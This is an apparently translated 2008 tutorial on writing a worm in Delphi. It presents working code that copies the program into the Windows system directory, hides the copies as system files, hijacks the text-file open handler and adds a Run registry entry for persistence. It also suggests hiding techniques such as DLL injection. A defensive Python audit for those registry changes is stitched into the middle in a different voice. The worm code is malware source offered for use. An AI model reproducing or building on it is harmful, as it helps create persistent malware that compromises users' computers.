Analysis of Writing a Worm in Delphi

Author: Anonymous    Updated: 2008-10-8 18:10:58
Preface:

When we think of viruses, the first reaction is usually that they must be written in asm or VBScript, and that a high-level language such as Delphi cannot do the job. In fact that is not the case: as long as we spend a little time on it, we can still write a virus program that is short and efficient, and no worse than one written in assembly.

For a short virus program, our first goal is to keep the compiled file below 30 KB. Anyone who has used Delphi knows that pulling in units such as Forms, Classes and so on makes the target file very large, so in our program we avoid those libraries as much as possible. We use only Windows, WinSock, ShellAPI and SysUtils (SysUtils contains many commonly used routines, such as file operations and string operations; if you write these routines yourself instead, the target file becomes even smaller).

First of all, a virus program generally consists of the following three sub-modules:

① protection module;

② infection module;

③ attack module.

Below we take these three modules in turn and implement each of them in code.

A) The protection module.

In general we copy ourselves into one of the system directories, for example %SystemRoot%. To do that we first have to obtain the path of that directory; the SDK provides the function GetSystemDirectory for this:

UINT GetSystemDirectory(
    LPTSTR lpBuffer, // buffer that receives the returned path string
    UINT uSize       // size of that buffer, in characters
);

The related function GetWindowsDirectory returns the path of %windir% in the same way.

Once we have the system directory, the second step is to copy the file. The SDK provides the function CopyFile:

BOOL CopyFile(
    LPCTSTR lpExistingFileName, // source file path
    LPCTSTR lpNewFileName,      // destination file path
    BOOL bFailIfExists          // flag: if the destination already exists, TRUE makes the call fail, FALSE overwrites it
);

With the copy done, we set the new file to hidden, so that it is normally not visible unless "show all files" is selected together with displaying protected operating system files. Again there is a function for this, SetFileAttributes:

BOOL SetFileAttributes(
    LPCTSTR lpFileName,     // name of the file whose attributes are to be set
    DWORD dwFileAttributes  // attribute value to set
);

Here we set both the system and the hidden attribute, so the second parameter is FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM.

The following is the most important part: making the file run automatically at boot. We usually do this by writing the registry. First, open a key with the RegOpenKey function:

LONG RegOpenKey(
    HKEY hKey,         // root key, for example HKEY_LOCAL_MACHINE
    LPCTSTR lpSubKey,  // subkey under that root
    PHKEY phkResult    // receives the handle of the opened key
);

Having the HKEY, RegSetValueEx can be used to write a specific value under that key.

LONG RegSetValueEx(
    HKEY hKey,             // the key handle we just obtained
    LPCTSTR lpValueName,   // name of the value to write
    DWORD Reserved,        // generally set to 0
    DWORD dwType,          // type of the data; for a string we write REG_SZ
    CONST BYTE *lpData,    // address of the data
    DWORD cbData           // length of the data to write
);

Now I combine the above description into a brief example:

// uses Windows, SysUtils
procedure SelfCopy;
var
  Path, Value: array[0..255] of Char;
  Hk: HKEY;
  S: string;
begin
  GetSystemDirectory(Path, 256);
  // get the path of the system directory
  S := StrPas(Path);
  // convert it to a string
  CopyFile(PChar(ParamStr(0)), PChar(S + '\ruin.exe'), False);
  CopyFile(PChar(ParamStr(0)), PChar(S + '\virus_ruin.exe'), False);
  // copy itself into the system directory as ruin.exe and virus_ruin.exe
  SetFileAttributes(PChar(S + '\ruin.exe'), FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
  SetFileAttributes(PChar(S + '\virus_ruin.exe'), FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
  // set the two files just copied to hidden and system
  RegOpenKey(HKEY_CLASSES_ROOT, 'txtfile\shell\open\command', Hk);
  Value := 'virus_ruin.exe %1';
  RegSetValueEx(Hk, '', 0, REG_SZ, @Value, StrLen(Value) + 1); // length includes the terminating null
  RegCloseKey(Hk);
  // associate text files with virus_ruin.exe
  RegOpenKey(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', Hk);
  Value := 'ruin.exe';
  RegSetValueEx(Hk, 'ruin', 0, REG_SZ, @Value, StrLen(Value) + 1);
  RegCloseKey(Hk);
  // make ruin.exe run automatically at boot
end;

Looking at the procedure above: it completes self-replication, sets itself to run automatically at startup, and associates itself with text files. That way, even if the entry under the Run key is deleted, the worm file is activated again as soon as the user opens a text file.

For this to work, however, your main program must check whether exactly one command-line parameter was passed; if so, open that text file and then carry out the self-protection.

For example:

begin
  if ParamCount = 1 then
    ShellExecute(0, 'open', 'notepad.exe', PChar(ParamStr(1)), nil, SW_NORMAL);
  // open the text file that was passed in with Notepad
  // other code ...
end.
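From the defender's side, the two registry changes made by SelfCopy above are easy to spot in an exported .reg file: a txtfile handler that no longer points at Notepad, and a Run entry given as a bare file name. The following Python audit is an added example, not code from the article; the .reg text it parses is constructed sample data, and the key paths and the expected handler name are the ones the article itself uses.

```python
# Constructed sample of a Windows .reg export (not taken from a real host) that
# contains the two keys the SelfCopy procedure above modifies.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="virus_ruin.exe %1"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ruin"="ruin.exe"
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"""

TXTFILE_KEY = r"HKEY_CLASSES_ROOT\txtfile\shell\open\command"
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
# Handler the txtfile association points at on a stock installation.
EXPECTED_TXT_HANDLER = "notepad.exe"


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the string values in a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            # .reg exports escape backslashes and quotes inside string data
            keys[current][name] = data.strip('"').replace('\\"', '"').replace("\\\\", "\\")
    return keys


def audit(keys):
    """Flag the persistence changes the article's worm makes; returns (reason, detail) pairs."""
    findings = []
    handler = keys.get(TXTFILE_KEY, {}).get("(Default)", "")
    # The worm keeps the "%1" argument so text files still open normally; only the
    # executable in front of it reveals the hijack, so that is what we check.
    if handler and EXPECTED_TXT_HANDLER not in handler.lower():
        findings.append(("txtfile handler hijack", handler))
    for name, target in keys.get(RUN_KEY, {}).items():
        # A bare file name (the article's Run value is just "ruin.exe") is resolved
        # through the search path, which includes the system directory it was copied to.
        if "\\" not in target and "/" not in target:
            findings.append(("Run entry without full path", f"{name}={target}"))
    return findings


if __name__ == "__main__":
    for reason, detail in audit(parse_reg_export(SAMPLE_REG)):
        print(f"{reason}: {detail}")
```

On a live host the same checks can be run against `reg export` output of the two keys, and any hit should be followed by a look at the hidden+system executables in the system directory.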

Here I have only given a simple example to convey the rough idea, and there is plenty of room for improvement, for example hiding the process: on Windows 98 you can use registerserverapplication, and on Windows 2000 you can start as a service, inject a DLL, hook a DLL that a startup program loads, or use win.ini.